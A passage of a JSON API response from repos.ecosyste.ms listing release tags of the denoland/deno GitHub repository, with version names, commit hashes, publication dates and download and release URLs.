,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/ho